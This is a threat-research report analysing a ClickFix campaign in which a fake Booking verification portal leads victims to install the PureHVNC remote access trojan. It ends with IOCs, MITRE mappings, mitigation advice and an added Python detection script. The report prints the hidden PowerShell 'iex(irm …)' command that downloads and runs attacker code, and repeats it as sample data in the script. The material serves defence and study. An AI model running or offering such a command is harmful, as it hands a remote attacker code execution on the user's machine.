Threat Research

ClickFix to PureHVNC: Multi-Stage Malware Delivery via Fake Booking Portal


Introduction

This campaign leverages the ClickFix social-engineering technique through a fake Booking-themed verification portal hosted at hxxps://bkngpanelcntlrguest[.]com to trick users into manually executing malicious PowerShell commands. By abusing legitimate Windows utilities such as PowerShell, the attackers achieve user-assisted code execution and initiate a multi-stage malware delivery chain.

The infection chain performs host reconnaissance using WMI/CIM, downloads staged ZIP payloads using stealth-focused HTTP requests and User-Agent spoofing, and establishes persistence through registry Run keys and scheduled tasks. The malware further employs in-memory PE loading and process injection into AddInProcess32.exe to evade detection and minimize forensic artifacts. Ultimately, the attack results in the deployment of the PureHVNC remote access trojan (RAT), enabling persistent remote access and attacker control.

Attack Flow Overview

  1. Victim visits a fake Booking(dot)com themed verification portal
  2. User is instructed to execute a malicious PowerShell command
  3. Stage-1 PowerShell payload is downloaded and executed
  4. System reconnaissance and AV discovery are performed
  5. Host information is exfiltrated to attacker-controlled infrastructure
  6. Stage-2 ZIP payload is downloaded and extracted
  7. Persistence is established via Run keys and scheduled tasks
  8. DLL side-loading through psl.exe executes the malicious DLL
  9. PureHVNC payload is injected into AddInProcess32.exe
  10. Remote access and persistence are established

Fig : ClickFix in Action: Fake Booking Verification Leads to Code Execution

At its core, the ClickFix infection chain relies on social engineering-driven user-assisted execution to initiate compromise. Victims interacting with the fake booking verification portal are instructed to open the Windows Run dialog (Win + R) and execute a malicious PowerShell command:

powershell -c "Start-Process -WindowStyle Hidden powershell -Args '-ExecutionPolicy Bypass -c iex(irm 58gold.com)'"

This command launches a hidden PowerShell instance, bypasses execution policy restrictions, and uses iex(irm …) to retrieve and execute PowerShell code directly in memory. By leveraging legitimate Windows utilities (PowerShell) and fileless execution techniques, the attackers minimize disk artifacts and evade conventional security controls, enabling stealthy initial access and staged malware delivery.

System Profiling

Fig : System Information gathering

This module performs host reconnaissance using WMI/CIM, collecting detailed system, hardware, and security information including AV presence and admin privileges. The module demonstrates environment awareness through privilege checking, security software enumeration, and subsequent C2 beaconing for data exfiltration. The use of obfuscation, error handling, and structured telemetry highlights characteristics of a modern malware reconnaissance module.

Data Exfiltration

Fig : Data exfiltration

This module acts as a C2 beaconing routine (hxxps[:]//58gold.com[/]h0v6wg63gK4DY2Sbkpy7eOnbTqgRSpzYDTgpjubd3qg7), collecting detailed host reconnaissance data (user, hostname, OS version, CPU/GPU, RAM, AV info, domain, privileges) and sending it to a C2 server using Invoke-WebRequest. It uses HTTP GET with URL-encoded parameters, includes a random “noise” value to evade pattern detection, and supports optional fields like executed file name or custom messages.

A built-in fallback communication mechanism ensures minimal telemetry exfiltration even if the primary request fails, highlighting resilience and stealth in attacker-controlled telemetry.

Stage 2 Payload Delivery via ZIP Download

Fig: Remote ZIP Payload Staging in Temp Directory

This module implements a resilient Stage 2 payload downloader that retrieves a ZIP file from a remote server using retry logic and exponential backoff. The downloader enhances reliability through dual download mechanisms using HttpClient and Invoke-WebRequest and enforces secure communication via TLS. The code includes stealth techniques like User-Agent spoofing, temporary file usage, and cleanup routines. It also performs strict validation checks (file size and ZIP integrity) before execution. Overall, this reflects a modern staged malware loader with robust and stealthy delivery mechanisms.

Fig : Stealthy HTTP Client with User-Agent spoofing
Fig : Extracted Stage 2 zip file

The PowerShell dropper downloads a ZIP archive from the compromised website clubcampestrededurango[.]com and extracts it into a hidden %LOCALAPPDATA% directory disguised as a legitimate libpsl installation. The package contains a malicious libpsl-5.dll placed alongside psl.exe, enabling DLL side-loading through DLL search order hijacking.

Persistence

Registry-Based Persistence

Fig : Persistence techniques using Run Key

This module establishes persistence via the Run registry key for the psl.exe file, ensuring the payload executes at every user logon. It uses an obfuscated, unique value name and reads the entry back after writing to confirm it was set. This reflects a common user-level persistence technique used by malware.

Scheduled Task-Based Persistence

The malware attempts fallback persistence by creating a scheduled task configured to execute the payload during user logon if registry-based persistence fails.

Fig : Persistence techniques using scheduled task

Trusted Binary (psl.exe) Abuse Through DLL Side-Loading

Fig : Malicious libpsl-5.dll Loaded by Legitimate Process psl

psl.exe is abused to load a malicious DLL, likely via DLL side-loading. By leveraging a trusted system binary, the attacker executes payload code under the guise of a legitimate process, helping evade traditional signature-based detection mechanisms. This technique is commonly used for stealthy execution and persistence in modern attacks.

PureHVNC Payload Staging with Process Injection

Fig : Payload Staging with Process Injection

The malware writes a PureHVNC payload file to the %TEMP% directory and maps it into memory using NtCreateSection with the SEC_IMAGE flag, indicating PE image loading for in-memory execution. The PureHVNC payload is then injected into the legitimate .NET process AddInProcess32.exe, a technique commonly used for stealthy code execution and defense evasion. Finally, the temporary file is marked for deletion via NtSetInformationFile, minimizing forensic artifacts and supporting covert execution.

Fig : Process Tree

Mutex Creation

To ensure only a single instance of the malware runs on the victim system, the malware creates a mutex named “Pzxymiidmy”. If the mutex already exists, execution is aborted.

Fig : Mutex Creation

MITRE ATT&CK Mapping

Tactic | Technique ID | Technique Name | Observed Activity
Initial Access | T1566 | Phishing | Fake booking-themed phishing portal used for user interaction
Execution | T1059.001 | PowerShell | Malicious PowerShell used for payload retrieval and execution
Execution | T1204.002 | User Execution: Malicious File | Victim manually executes attacker-provided command
Defense Evasion | T1027 | Obfuscated Files or Information | Heavy variable obfuscation
Defense Evasion | T1218 | Signed Binary Proxy Execution | Abuse of legitimate binaries such as psl.exe
Defense Evasion | T1574 | DLL Side-Loading | psl.exe loads malicious libpsl-5.dll
Defense Evasion | T1036 | Masquerading | Malicious files disguised as legitimate libpsl components
Persistence | T1547.001 | Registry Run Keys / Startup Folder | Persistence via HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Persistence | T1053.005 | Scheduled Task | Fallback persistence through scheduled task creation
Discovery | T1082 | System Information Discovery | Collection of OS, hostname, hardware, and architecture details
Discovery | T1518.001 | Security Software Discovery | Enumerates installed AV products via WMI/CIM
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | C2 communication over HTTP/HTTPS
Command and Control | T1105 | Ingress Tool Transfer | Downloads ZIP archive and secondary payloads
Command and Control | T1001 | Data Obfuscation | URL encoding and randomized “noise” parameters
Privilege Escalation | T1055 | Process Injection | Payload injected into AddInProcess32.exe
Resource Development | T1584.001 | Compromise Infrastructure: Domains | Abuse of compromised domain clubcampestrededurango[.]com
Command and Control | T1573 | Encrypted Channel | TLS-enabled communications for payload delivery

Indicators of Compromise (IOCs)

File Hashes (SHA-256)

SHA-256 | Name
ca1dbbbd75b898b5df5ff2a63b592ecdcd2777b0d370eb3848d9604e02627e64 | cliclfix.ps1
526cd0ca695d223e6c244c7a557f9d115fe2f68fbe2684fe403a04de908c70d3 | libpsl-5.dll
354daf11614e9c0097798f213e0867aa68c8d736b26e54ef67c0ba9c3da415a1 | PureHVNC RAT
68e81ce966ca0c016bb638d0d29b106a0da7eab2ddf70438d8182fa89baf5d78 | psl.exe

C2 Infrastructure

Indicator | Type
hxxps://58gold[.]com/h0v6wg63gK4DY2Sbkpy7eOnbTqgRSpzYDTgpjubd3qg7 | URL
58gold[.]com | Domain
clubcampestrededurango[.]com | Domain
hxxps://clubcampestrededurango[.]com/clubcampestrededurango.zip | URL
94.26.90.216:56001 | IP:Port

Detection and Mitigation Recommendations

Organizations can reduce exposure to ClickFix-style malware campaigns by implementing continuous monitoring, behavioral analytics, and threat correlation capabilities through Gurucul SIEM.

  • Monitor Suspicious PowerShell Activity: Detect PowerShell execution involving iex(irm ...), execution policy bypasses, hidden PowerShell windows, and suspicious command-line arguments commonly associated with ClickFix delivery mechanisms.
  • Detect User-Assisted Execution Techniques: Identify anomalous execution workflows involving the Windows Run dialog (Win + R), unexpected PowerShell child processes of explorer.exe, and unusual user-driven command execution activity.
  • Identify Persistence Mechanisms: Monitor registry Run key modifications, scheduled task creation events, and suspicious startup persistence techniques associated with multi-stage malware infections.
  • Detect DLL Side-Loading Activity: Correlate execution events where trusted binaries such as psl.exe load unsigned or suspicious DLLs from abnormal file paths (for example, user-writable directories under %LOCALAPPDATA%), helping identify DLL side-loading attempts.
  • Monitor Process Injection and In-Memory Execution: Detect suspicious process injection behavior, section mapping activity, and anomalous execution involving legitimate processes such as AddInProcess32.exe.
  • Correlate Multi-Stage Attack Activity: Use behavioral correlation to connect reconnaissance, payload staging, persistence creation, and command-and-control communications into a single attack timeline for faster incident investigation.
  • Monitor Beaconing and Suspicious Network Activity: Identify outbound connections to newly observed or low-reputation domains, suspicious HTTPS communications, and repeated beaconing behavior associated with command-and-control infrastructure.
  • Leverage Threat Intelligence and IOC Correlation: Continuously correlate malicious hashes, domains, URLs, and infrastructure indicators against security telemetry to accelerate detection and threat hunting activities.
  • Prioritize Behavioral Detection: Since this campaign heavily abuses legitimate Windows utilities and fileless execution techniques, organizations should prioritize behavioral analytics and anomaly-based detections rather than relying solely on static signatures or hash-based detections.
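The following detection logic is an added example (not part of the original report or any Gurucul product) that applies the recommendations above to constructed Sysmon-style events: it flags the ClickFix PowerShell one-liner spawned from the Run dialog, a Run key pointing into a user-writable directory, an unsigned DLL side-loaded next to its host EXE, and AddInProcess32.exe launched from a user-writable path, then correlates them into one chain. The event field names, user name, paths and value name are assumptions made for this example.

```python
import os
import re

# Constructed Sysmon-style events (not captured from the campaign): ID 1 = process
# create, 7 = image load, 13 = registry value set. Paths and value names are made up.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell -c \"Start-Process -WindowStyle Hidden powershell "
            "-Args '-ExecutionPolicy Bypass -c iex(irm 58gold.com)'\""},
    {"id": 13, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\q7Kd2x",
     "details": r"C:\Users\alice\AppData\Local\libpsl\psl.exe"},
    {"id": 7, "image": r"C:\Users\alice\AppData\Local\libpsl\psl.exe",
     "loaded": r"C:\Users\alice\AppData\Local\libpsl\libpsl-5.dll", "signed": False},
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "parent": r"C:\Users\alice\AppData\Local\libpsl\psl.exe", "cmd": "AddInProcess32.exe"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "powershell -File deploy.ps1"},  # benign
]

# Markers of the ClickFix one-liner: remote fetch into iex, policy bypass, hidden window.
CLICKFIX = re.compile(r"iex\s*\(\s*irm\b|-ExecutionPolicy\s+Bypass|-WindowStyle\s+Hidden", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
USER_WRITABLE = re.compile(r"\\AppData\\(Local|Roaming)\\|\\Temp\\", re.I)

def _norm(path):
    return path.replace("\\", "/").lower()

def classify(ev):
    """Return the detection tags triggered by a single event."""
    tags = []
    if ev["id"] == 1:
        # Run-dialog launches have explorer.exe as parent; require >=2 markers to cut noise.
        if len(CLICKFIX.findall(ev["cmd"])) >= 2 and _norm(ev["parent"]).endswith("/explorer.exe"):
            tags.append("clickfix_powershell")
        # AddInProcess32.exe is a .NET host; a parent living in a user-writable dir is anomalous.
        if _norm(ev["image"]).endswith("/addinprocess32.exe") and USER_WRITABLE.search(ev["parent"]):
            tags.append("injection_host_spawn")
    elif ev["id"] == 7:
        # Side-loading: unsigned DLL loaded from the same user-writable directory as the EXE.
        same_dir = os.path.dirname(_norm(ev["image"])) == os.path.dirname(_norm(ev["loaded"]))
        if not ev["signed"] and same_dir and USER_WRITABLE.search(ev["loaded"]):
            tags.append("dll_sideload")
    elif ev["id"] == 13 and RUN_KEY.search(ev["target"]) and USER_WRITABLE.search(ev["details"]):
        tags.append("runkey_persistence")
    return tags

def detect_chain(events):
    """Distinct tags across one host's events; 'chain' when 3+ stages co-occur."""
    seen = sorted({t for ev in events for t in classify(ev)})
    return {"tags": seen, "chain": len(seen) >= 3}
```

Fed a host's process-create, image-load and registry events, detect_chain gives the single correlated verdict the recommendations call for instead of four isolated alerts.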


Conclusion

This campaign demonstrates how ClickFix-style social engineering continues to evolve into an effective initial access technique for delivering sophisticated malware frameworks. By combining user-assisted PowerShell execution, staged payload delivery, DLL side-loading, persistence mechanisms, and in-memory process injection, the operators behind this activity achieve stealthy deployment of the PureHVNC RAT while minimizing forensic visibility.

The campaign also highlights increasing abuse of legitimate Windows utilities and trusted binaries to evade conventional security controls. Organizations should prioritize behavioral detection strategies focused on suspicious PowerShell execution, persistence creation, DLL side-loading, and anomalous process injection activity rather than relying solely on static indicators.

Contributors:


Pandurang Terkar

Rudra Pratap
